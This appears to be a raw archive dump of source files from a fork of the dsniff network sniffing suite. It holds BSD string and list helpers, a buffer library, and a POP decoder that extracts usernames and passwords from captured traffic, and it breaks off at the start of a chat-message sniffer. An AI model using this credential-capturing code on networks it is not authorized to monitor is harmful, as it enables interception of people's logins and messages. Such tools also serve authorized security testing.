OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #if defined(LIBC_SCCS) && !defined(lint) static char *rcsid = "$OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $"; #endif /* LIBC_SCCS and not lint */ #include #include /* * Appends src to string dst of size siz (unlike strncat, siz is the * full size of dst, not space left). At most siz-1 characters * will be copied. Always NUL terminates (unless siz == 0). * Returns strlen(src); if retval >= siz, truncation occurred. */ size_t strlcat(dst, src, siz) char *dst; const char *src; size_t siz; { register char *d = dst; register const char *s = src; register size_t n = siz; size_t dlen; /* Find the end of dst and adjust bytes left */ while (*d != '\0' && n != 0) d++; dlen = d - dst; n -= dlen; if (n == 0) return(dlen + strlen(s)); while (*s != '\0') { if (n != 1) { *d++ = *s; n--; } s++; } *d = '\0'; return(dlen + (s - src)); /* count does not include NUL */ } hackerschoice-dsniff-a17510d/missing/ethers.c0000664000175000017500000000620715105626144021126 0ustar epsilonepsilon/* $Id: ethers.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: ethers.c,v 1.10 1998/11/18 23:28:54 deraadt Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* * ethers(3) a la Sun. * Originally Written by Roland McGrath 10/14/93. * Substantially modified by Todd C. Miller */ #include #include #include #include #include #include #include #include #include #include char * ether_ntoa(e) struct ether_addr *e; { static char a[] = "xx:xx:xx:xx:xx:xx"; if (e->ether_addr_octet[0] > 0xFF || e->ether_addr_octet[1] > 0xFF || e->ether_addr_octet[2] > 0xFF || e->ether_addr_octet[3] > 0xFF || e->ether_addr_octet[4] > 0xFF || e->ether_addr_octet[5] > 0xFF) { errno = EINVAL; return (NULL); } (void)sprintf(a, "%02x:%02x:%02x:%02x:%02x:%02x", e->ether_addr_octet[0], e->ether_addr_octet[1], e->ether_addr_octet[2], e->ether_addr_octet[3], e->ether_addr_octet[4], e->ether_addr_octet[5]); return (a); } static char * _ether_aton(s, e) char *s; struct ether_addr *e; { int i; long l; char *pp; while (isspace(*s)) s++; /* expect 6 hex octets separated by ':' or space/NUL if last octet */ for (i = 0; i < 6; i++) { l = strtol(s, &pp, 16); if (pp == s || l > 0xFF || l < 0) return (NULL); if (!(*pp == ':' || (i == 5 && (isspace(*pp) || *pp == '\0')))) return (NULL); e->ether_addr_octet[i] = (u_char)l; s = pp + 1; } /* return character after the octets ala strtol(3) */ return (pp); } struct ether_addr * ether_aton(s) char *s; { static struct ether_addr n; return (_ether_aton(s, &n) ? &n : NULL); } hackerschoice-dsniff-a17510d/missing/strsep.c0000664000175000017500000000547715105626144021164 0ustar epsilonepsilon/* $Id: strsep.c,v 1.1 2000/11/28 18:26:52 dugsong Exp $ */ /* $OpenBSD: strsep.c,v 1.3 1997/08/20 04:28:14 millert Exp $ */ /*- * Copyright (c) 1990, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #include /* * Get next token from string *stringp, where tokens are possibly-empty * strings separated by characters from delim. * * Writes NULs into the string at *stringp to end tokens. * delim need not remain constant from call to call. * On return, *stringp points past the last NUL written (if there might * be further tokens), or is NULL (if there are definitely no more tokens). * * If *stringp is NULL, strsep returns NULL. */ char * strsep(stringp, delim) register char **stringp; register const char *delim; { register char *s; register const char *spanp; register int c, sc; char *tok; if ((s = *stringp) == NULL) return (NULL); for (tok = s;;) { c = *s++; spanp = delim; do { if ((sc = *spanp++) == c) { if (c == 0) s = NULL; else s[-1] = 0; *stringp = s; return (tok); } } while (sc != 0); } /* NOTREACHED */ } hackerschoice-dsniff-a17510d/missing/sys/0000775000175000017500000000000015105626144020301 5ustar epsilonepsilonhackerschoice-dsniff-a17510d/missing/sys/queue.h0000664000175000017500000004075115105626144021605 0ustar epsilonepsilon/* $OpenBSD: queue.h,v 1.15 2000/04/15 00:20:13 deraadt Exp $ */ /* $NetBSD: queue.h,v 1.11 1996/05/16 05:17:14 mycroft Exp $ */ /* * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)queue.h 8.5 (Berkeley) 8/20/94 */ #ifndef _SYS_QUEUE_H_ #define _SYS_QUEUE_H_ /* * This file defines five types of data structures: singly-linked lists, * lists, simple queues, tail queues, and circular queues. * * * A singly-linked list is headed by a single forward pointer. The elements * are singly linked for minimum space and pointer manipulation overhead at * the expense of O(n) removal for arbitrary elements. New elements can be * added to the list after an existing element or at the head of the list. * Elements being removed from the head of the list should use the explicit * macro for this purpose for optimum efficiency. A singly-linked list may * only be traversed in the forward direction. Singly-linked lists are ideal * for applications with large datasets and few or no removals or for * implementing a LIFO queue. * * A list is headed by a single forward pointer (or an array of forward * pointers for a hash table header). The elements are doubly linked * so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before * or after an existing element or at the head of the list. A list * may only be traversed in the forward direction. * * A simple queue is headed by a pair of pointers, one the head of the * list and the other to the tail of the list. The elements are singly * linked to save space, so elements can only be removed from the * head of the list. New elements can be added to the list before or after * an existing element, at the head of the list, or at the end of the * list. A simple queue may only be traversed in the forward direction. * * A tail queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or * after an existing element, at the head of the list, or at the end of * the list. A tail queue may be traversed in either direction. * * A circle queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or after * an existing element, at the head of the list, or at the end of the list. * A circle queue may be traversed in either direction, but has a more * complex end of list detection. * * For details on the use of these macros, see the queue(3) manual page. */ /* * Singly-linked List definitions. */ #define SLIST_HEAD(name, type) \ struct name { \ struct type *slh_first; /* first element */ \ } #define SLIST_HEAD_INITIALIZER(head) \ { NULL } #define SLIST_ENTRY(type) \ struct { \ struct type *sle_next; /* next element */ \ } /* * Singly-linked List access methods. */ #define SLIST_FIRST(head) ((head)->slh_first) #define SLIST_END(head) NULL #define SLIST_EMPTY(head) (SLIST_FIRST(head) == SLIST_END(head)) #define SLIST_NEXT(elm, field) ((elm)->field.sle_next) #define SLIST_FOREACH(var, head, field) \ for((var) = SLIST_FIRST(head); \ (var) != SLIST_END(head); \ (var) = SLIST_NEXT(var, field)) /* * Singly-linked List functions. */ #define SLIST_INIT(head) { \ SLIST_FIRST(head) = SLIST_END(head); \ } #define SLIST_INSERT_AFTER(slistelm, elm, field) do { \ (elm)->field.sle_next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = (elm); \ } while (0) #define SLIST_INSERT_HEAD(head, elm, field) do { \ (elm)->field.sle_next = (head)->slh_first; \ (head)->slh_first = (elm); \ } while (0) #define SLIST_REMOVE_HEAD(head, field) do { \ (head)->slh_first = (head)->slh_first->field.sle_next; \ } while (0) /* * List definitions. */ #define LIST_HEAD(name, type) \ struct name { \ struct type *lh_first; /* first element */ \ } #define LIST_HEAD_INITIALIZER(head) \ { NULL } #define LIST_ENTRY(type) \ struct { \ struct type *le_next; /* next element */ \ struct type **le_prev; /* address of previous next element */ \ } /* * List access methods */ #define LIST_FIRST(head) ((head)->lh_first) #define LIST_END(head) NULL #define LIST_EMPTY(head) (LIST_FIRST(head) == LIST_END(head)) #define LIST_NEXT(elm, field) ((elm)->field.le_next) #define LIST_FOREACH(var, head, field) \ for((var) = LIST_FIRST(head); \ (var)!= LIST_END(head); \ (var) = LIST_NEXT(var, field)) /* * List functions. */ #define LIST_INIT(head) do { \ LIST_FIRST(head) = LIST_END(head); \ } while (0) #define LIST_INSERT_AFTER(listelm, elm, field) do { \ if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ (listelm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ (listelm)->field.le_next = (elm); \ (elm)->field.le_prev = &(listelm)->field.le_next; \ } while (0) #define LIST_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ *(listelm)->field.le_prev = (elm); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (0) #define LIST_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.le_next = (head)->lh_first) != NULL) \ (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ (head)->lh_first = (elm); \ (elm)->field.le_prev = &(head)->lh_first; \ } while (0) #define LIST_REMOVE(elm, field) do { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ } while (0) #define LIST_REPLACE(elm, elm2, field) do { \ if (((elm2)->field.le_next = (elm)->field.le_next) != NULL) \ (elm2)->field.le_next->field.le_prev = \ &(elm2)->field.le_next; \ (elm2)->field.le_prev = (elm)->field.le_prev; \ *(elm2)->field.le_prev = (elm2); \ } while (0) /* * Simple queue definitions. */ #define SIMPLEQ_HEAD(name, type) \ struct name { \ struct type *sqh_first; /* first element */ \ struct type **sqh_last; /* addr of last next element */ \ } #define SIMPLEQ_HEAD_INITIALIZER(head) \ { NULL, &(head).sqh_first } #define SIMPLEQ_ENTRY(type) \ struct { \ struct type *sqe_next; /* next element */ \ } /* * Simple queue access methods. */ #define SIMPLEQ_FIRST(head) ((head)->sqh_first) #define SIMPLEQ_END(head) NULL #define SIMPLEQ_EMPTY(head) (SIMPLEQ_FIRST(head) == SIMPLEQ_END(head)) #define SIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) #define SIMPLEQ_FOREACH(var, head, field) \ for((var) = SIMPLEQ_FIRST(head); \ (var) != SIMPLEQ_END(head); \ (var) = SIMPLEQ_NEXT(var, field)) /* * Simple queue functions. */ #define SIMPLEQ_INIT(head) do { \ (head)->sqh_first = NULL; \ (head)->sqh_last = &(head)->sqh_first; \ } while (0) #define SIMPLEQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (head)->sqh_first = (elm); \ } while (0) #define SIMPLEQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ *(head)->sqh_last = (elm); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (0) #define SIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL)\ (head)->sqh_last = &(elm)->field.sqe_next; \ (listelm)->field.sqe_next = (elm); \ } while (0) #define SIMPLEQ_REMOVE_HEAD(head, elm, field) do { \ if (((head)->sqh_first = (elm)->field.sqe_next) == NULL) \ (head)->sqh_last = &(head)->sqh_first; \ } while (0) /* * Tail queue definitions. */ #define TAILQ_HEAD(name, type) \ struct name { \ struct type *tqh_first; /* first element */ \ struct type **tqh_last; /* addr of last next element */ \ } #define TAILQ_HEAD_INITIALIZER(head) \ { NULL, &(head).tqh_first } #define TAILQ_ENTRY(type) \ struct { \ struct type *tqe_next; /* next element */ \ struct type **tqe_prev; /* address of previous next element */ \ } /* * tail queue access methods */ #define TAILQ_FIRST(head) ((head)->tqh_first) #define TAILQ_END(head) NULL #define TAILQ_NEXT(elm, field) ((elm)->field.tqe_next) #define TAILQ_LAST(head, headname) \ (*(((struct headname *)((head)->tqh_last))->tqh_last)) /* XXX */ #define TAILQ_PREV(elm, headname, field) \ (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) #define TAILQ_EMPTY(head) \ (TAILQ_FIRST(head) == TAILQ_END(head)) #define TAILQ_FOREACH(var, head, field) \ for((var) = TAILQ_FIRST(head); \ (var) != TAILQ_END(head); \ (var) = TAILQ_NEXT(var, field)) #define TAILQ_FOREACH_REVERSE(var, head, field) \ for((var) = TAILQ_LAST(head); \ (var) != TAILQ_END(head); \ (var) = TAILQ_PREV(var, field)) /* * Tail queue functions. */ #define TAILQ_INIT(head) do { \ (head)->tqh_first = NULL; \ (head)->tqh_last = &(head)->tqh_first; \ } while (0) #define TAILQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ (head)->tqh_first->field.tqe_prev = \ &(elm)->field.tqe_next; \ else \ (head)->tqh_last = &(elm)->field.tqe_next; \ (head)->tqh_first = (elm); \ (elm)->field.tqe_prev = &(head)->tqh_first; \ } while (0) #define TAILQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_prev = (head)->tqh_last; \ *(head)->tqh_last = (elm); \ (head)->tqh_last = &(elm)->field.tqe_next; \ } while (0) #define TAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ (elm)->field.tqe_next->field.tqe_prev = \ &(elm)->field.tqe_next; \ else \ (head)->tqh_last = &(elm)->field.tqe_next; \ (listelm)->field.tqe_next = (elm); \ (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ } while (0) #define TAILQ_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ (elm)->field.tqe_next = (listelm); \ *(listelm)->field.tqe_prev = (elm); \ (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ } while (0) #define TAILQ_REMOVE(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) \ (elm)->field.tqe_next->field.tqe_prev = \ (elm)->field.tqe_prev; \ else \ (head)->tqh_last = (elm)->field.tqe_prev; \ *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ } while (0) #define TAILQ_REPLACE(head, elm, elm2, field) do { \ if (((elm2)->field.tqe_next = (elm)->field.tqe_next) != NULL) \ (elm2)->field.tqe_next->field.tqe_prev = \ &(elm2)->field.tqe_next; \ else \ (head)->tqh_last = &(elm2)->field.tqe_next; \ (elm2)->field.tqe_prev = (elm)->field.tqe_prev; \ *(elm2)->field.tqe_prev = (elm2); \ } while (0) /* * Circular queue definitions. */ #define CIRCLEQ_HEAD(name, type) \ struct name { \ struct type *cqh_first; /* first element */ \ struct type *cqh_last; /* last element */ \ } #define CIRCLEQ_HEAD_INITIALIZER(head) \ { CIRCLEQ_END(&head), CIRCLEQ_END(&head) } #define CIRCLEQ_ENTRY(type) \ struct { \ struct type *cqe_next; /* next element */ \ struct type *cqe_prev; /* previous element */ \ } /* * Circular queue access methods */ #define CIRCLEQ_FIRST(head) ((head)->cqh_first) #define CIRCLEQ_LAST(head) ((head)->cqh_last) #define CIRCLEQ_END(head) ((void *)(head)) #define CIRCLEQ_NEXT(elm, field) ((elm)->field.cqe_next) #define CIRCLEQ_PREV(elm, field) ((elm)->field.cqe_prev) #define CIRCLEQ_EMPTY(head) \ (CIRCLEQ_FIRST(head) == CIRCLEQ_END(head)) #define CIRCLEQ_FOREACH(var, head, field) \ for((var) = CIRCLEQ_FIRST(head); \ (var) != CIRCLEQ_END(head); \ (var) = CIRCLEQ_NEXT(var, field)) #define CIRCLEQ_FOREACH_REVERSE(var, head, field) \ for((var) = CIRCLEQ_LAST(head); \ (var) != CIRCLEQ_END(head); \ (var) = CIRCLEQ_PREV(var, field)) /* * Circular queue functions. */ #define CIRCLEQ_INIT(head) do { \ (head)->cqh_first = CIRCLEQ_END(head); \ (head)->cqh_last = CIRCLEQ_END(head); \ } while (0) #define CIRCLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ (elm)->field.cqe_next = (listelm)->field.cqe_next; \ (elm)->field.cqe_prev = (listelm); \ if ((listelm)->field.cqe_next == CIRCLEQ_END(head)) \ (head)->cqh_last = (elm); \ else \ (listelm)->field.cqe_next->field.cqe_prev = (elm); \ (listelm)->field.cqe_next = (elm); \ } while (0) #define CIRCLEQ_INSERT_BEFORE(head, listelm, elm, field) do { \ (elm)->field.cqe_next = (listelm); \ (elm)->field.cqe_prev = (listelm)->field.cqe_prev; \ if ((listelm)->field.cqe_prev == CIRCLEQ_END(head)) \ (head)->cqh_first = (elm); \ else \ (listelm)->field.cqe_prev->field.cqe_next = (elm); \ (listelm)->field.cqe_prev = (elm); \ } while (0) #define CIRCLEQ_INSERT_HEAD(head, elm, field) do { \ (elm)->field.cqe_next = (head)->cqh_first; \ (elm)->field.cqe_prev = CIRCLEQ_END(head); \ if ((head)->cqh_last == CIRCLEQ_END(head)) \ (head)->cqh_last = (elm); \ else \ (head)->cqh_first->field.cqe_prev = (elm); \ (head)->cqh_first = (elm); \ } while (0) #define CIRCLEQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.cqe_next = CIRCLEQ_END(head); \ (elm)->field.cqe_prev = (head)->cqh_last; \ if ((head)->cqh_first == CIRCLEQ_END(head)) \ (head)->cqh_first = (elm); \ else \ (head)->cqh_last->field.cqe_next = (elm); \ (head)->cqh_last = (elm); \ } while (0) #define CIRCLEQ_REMOVE(head, elm, field) do { \ if ((elm)->field.cqe_next == CIRCLEQ_END(head)) \ (head)->cqh_last = (elm)->field.cqe_prev; \ else \ (elm)->field.cqe_next->field.cqe_prev = \ (elm)->field.cqe_prev; \ if ((elm)->field.cqe_prev == CIRCLEQ_END(head)) \ (head)->cqh_first = (elm)->field.cqe_next; \ else \ (elm)->field.cqe_prev->field.cqe_next = \ (elm)->field.cqe_next; \ } while (0) #define CIRCLEQ_REPLACE(head, elm, elm2, field) do { \ if (((elm2)->field.cqe_next = (elm)->field.cqe_next) == \ CIRCLEQ_END(head)) \ (head).cqh_last = (elm2); \ else \ (elm2)->field.cqe_next->field.cqe_prev = (elm2); \ if (((elm2)->field.cqe_prev = (elm)->field.cqe_prev) == \ CIRCLEQ_END(head)) \ (head).cqh_first = (elm2); \ else \ (elm2)->field.cqe_prev->field.cqe_next = (elm2); \ } while (0) #endif /* !_SYS_QUEUE_H_ */ hackerschoice-dsniff-a17510d/buf.c0000664000175000017500000000747115105626144016743 0ustar epsilonepsilon/* * buf.c * * Copyright (c) 2000 Dug Song * * $Id: buf.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include "buf.h" void buf_init(buf_t buf, u_char *data, int len) { buf->base = data; buf->end = buf->size = len; buf->offset = 0; } buf_t buf_new(int size) { buf_t buf; if ((buf = malloc(sizeof(*buf))) == NULL) return (NULL); if ((buf->base = malloc(size)) == NULL) { free(buf); return (NULL); } buf->size = size; buf->offset = 0; buf->end = 0; return (buf); } void buf_free(buf_t buf) { if (buf->base != NULL) { free(buf->base); } free(buf); } int buf_seek(buf_t buf, int off, int whence) { if ((whence == SEEK_SET) && (off <= buf->size)) { buf->offset = off; } else if ((whence == SEEK_CUR) && ((buf->offset + off) <= buf->size)) { buf->offset += off; } else return (-1); return (buf->offset); } int buf_get(buf_t buf, void *dst, int len) { u_char *p; int i; p = dst; if (buf_len(buf) < len) { return (-1); } for (i = 0; i < len; i++) p[i] = buf->base[buf->offset + i]; buf->offset += len; return (len); } int buf_put(buf_t buf, void *src, int len) { if (buf->offset + len > buf->size) { return (-1); } memcpy(buf_ptr(buf), src, len); buf->offset += len; return (len); } int buf_putf(buf_t buf, const char *fmt, ...) { va_list ap; int i; va_start(ap, fmt); i = vsnprintf(buf_ptr(buf), buf_len(buf), fmt, ap); va_end(ap); buf_skip(buf, i); return (i); } void buf_end(buf_t buf) { buf->end = buf->offset; buf->offset = 0; } int buf_index(buf_t buf, void *ptr, int len) { u_char *p, *q; p = buf_ptr(buf); q = buf->base + buf->end; for (; q - p >= len; p++) { if (memcmp(p, ptr, len) == 0) return (p - buf_ptr(buf)); } return (-1); } int buf_rindex(buf_t buf, void *ptr, int len) { u_char *p, *q; p = buf->base + buf->end - len; q = buf_ptr(buf); for (; p > q; p--) { if (memcmp(p, ptr, len) == 0) return (p - q); } return (-1); } int buf_cmp(buf_t buf, void *ptr, int len) { if (buf_len(buf) < len) return (-1); return (memcmp(buf_ptr(buf), ptr, len)); } buf_t buf_tok(buf_t buf, void *sep, int len) { static struct buf *savebuf, tokbuf; int off; if (buf != NULL) savebuf = buf; if (sep == NULL && buf_len(savebuf) >= len) { tokbuf.base = buf_ptr(savebuf); tokbuf.offset = 0; tokbuf.size = tokbuf.end = len; buf_skip(savebuf, len); } else if ((off = buf_index(savebuf, sep, len)) != -1) { tokbuf.base = buf_ptr(savebuf); tokbuf.offset = 0; tokbuf.size = tokbuf.end = off; buf_skip(savebuf, off + len); } else if (buf_len(savebuf) > 0) { tokbuf.base = buf_ptr(savebuf); tokbuf.offset = 0; tokbuf.size = tokbuf.end = buf_len(savebuf); savebuf->offset = savebuf->end; } else return (NULL); return (&tokbuf); } buf_t buf_getbuf(buf_t buf, int offset, int len) { buf_t b; if (buf->offset + offset + len > buf->end) return (NULL); buf_skip(buf, offset); if ((b = buf_new(len)) != NULL) { buf_put(b, buf_ptr(buf), len); buf_end(b); } buf_skip(buf, len); return (b); } buf_t buf_getword(buf_t buf, void *sep, int len) { buf_t b; int off; if ((off = buf_index(buf, sep, len)) < 0) return (NULL); if ((b = buf_new(off)) != NULL) { buf_put(b, buf_ptr(buf), off); buf_end(b); buf_skip(buf, off + len); } return (b); } char * buf_strdup(buf_t buf) { char *p; int i; i = buf_len(buf); if ((p = malloc(i + 1)) == NULL) err(1, "malloc"); memcpy(p, buf_ptr(buf), i); p[i] = '\0'; return (p); } int buf_isascii(buf_t buf) { u_char *p, *q; p = buf_ptr(buf); q = buf->base + buf->end; for (; p < q; p++) if (!isascii(*p)) return (0); return (1); } hackerschoice-dsniff-a17510d/acconfig.h0000664000175000017500000000103515105626144017733 0ustar epsilonepsilon/* Define to 'uint32_t' if doesn't define. */ #undef u_int32_t /* Define to 'uint64_t' if doesn't define. */ #undef u_int64_t /* Define to 'u_int32_t' if doesn't define. */ #undef in_addr_t /* Define if you have the header file. */ #undef HAVE_DB_H /* Define if you have the header file. */ #undef HAVE_DB_185_H /* Should be in , *sigh* */ #undef HAVE_MINMAX #ifndef HAVE_MINMAX #define MIN(a,b) (((a)<(b))?(a):(b)) #define MAX(a,b) (((a)>(b))?(a):(b)) #endif hackerschoice-dsniff-a17510d/decode_pop.c0000664000175000017500000000432715105626144020265 0ustar epsilonepsilon/* * decode_pop.c * * Post Office Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ * * Rewritten by Stefan Tomanek 2011 */ #include "config.h" #include #include #include #include #include "base64.h" #include "options.h" #include "decode.h" extern struct _dc_meta dc_meta; int decode_poppass(u_char *buf, int len, u_char *obuf, int olen) { char *p; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (strncasecmp(p, "user ", 5) == 0 || strncasecmp(p, "pass ", 5) == 0 || strncasecmp(p, "newpass ", 8) == 0) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); } } if (strip_lines(obuf, Opt_lines) < 3) return (0); return (strlen(obuf)); } int decode_pop(u_char *buf, int len, u_char *obuf, int olen) { char *p; char *s; int n; int i, j; char *user; char *password; enum { NONE, AUTHPLAIN, AUTHLOGIN, USERPASS } mode = NONE; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (mode == NONE) { user = NULL; password = NULL; if (strncasecmp(p, "AUTH PLAIN", 10) == 0) { mode = AUTHPLAIN; continue; } if (strncasecmp(p, "AUTH LOGIN", 10) == 0) { mode = AUTHLOGIN; continue; } if (strncasecmp(p, "USER ", 5) == 0) { mode = USERPASS; /* the traditional login cuts right to the case, * so no continue here */ } } if (mode == USERPASS) { if (strncasecmp(p, "USER ", 5) == 0) { user = &p[5]; } else if (strncasecmp(p, "PASS ", 5) == 0) { password = &p[5]; } } if (mode == AUTHPLAIN) { decode_authplain(p, &user, &password); } if (mode == AUTHLOGIN) { j = base64_pton(p, p, strlen(p)); p[j] = '\0'; if (!user) { user = p; } else { password = p; /* got everything we need :-) */ } } if (user && password) { strlcat(obuf, "username [", olen); strlcat(obuf, user, olen); strlcat(obuf, "] password [", olen); strlcat(obuf, password, olen); strlcat(obuf, "]\n", olen); dc_meta.is_hot = 1; mode = NONE; } } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/options.h0000664000175000017500000000073115105626144017657 0ustar epsilonepsilon/* * options.h * * Global options. * * Copyright (c) 2000 Dug Song * * $Id: options.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef OPTIONS_H #define OPTIONS_H extern int Opt_client; extern u_short Opt_dns; extern int Opt_debug; extern int Opt_magic; extern int Opt_read; extern int Opt_write; extern int Opt_snaplen; extern int Opt_lines; extern int Opt_verbose; extern int Opt_show_dups; extern int Opt_color; #endif /* OPTIONS_H */ hackerschoice-dsniff-a17510d/msgsnarf.c0000664000175000017500000003620615105626144020005 0ustar epsilonepsilon/* * msgsnarf.c * * Sniff chat messages (AIM, ICQ, IRC, MSN, Yahoo) on a network. * * Copyright (c) 1999 Dug Song * * $Id: msgsnarf.c,v 1.11 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include "buf.h" #include "decode.h" struct client_info { char *nick; char *peer; char *type; in_addr_t ip; SLIST_ENTRY(client_info) 